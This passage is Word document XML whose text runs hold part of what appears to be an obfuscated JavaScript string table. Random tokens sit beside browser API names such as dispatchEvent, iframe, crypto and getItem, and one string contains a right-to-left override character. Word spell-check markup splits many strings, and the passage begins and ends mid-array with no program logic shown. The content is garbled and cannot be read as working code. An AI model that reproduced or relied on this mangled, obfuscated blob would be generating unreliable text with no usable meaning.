        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMU</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>o9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw","QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg","E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg","7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
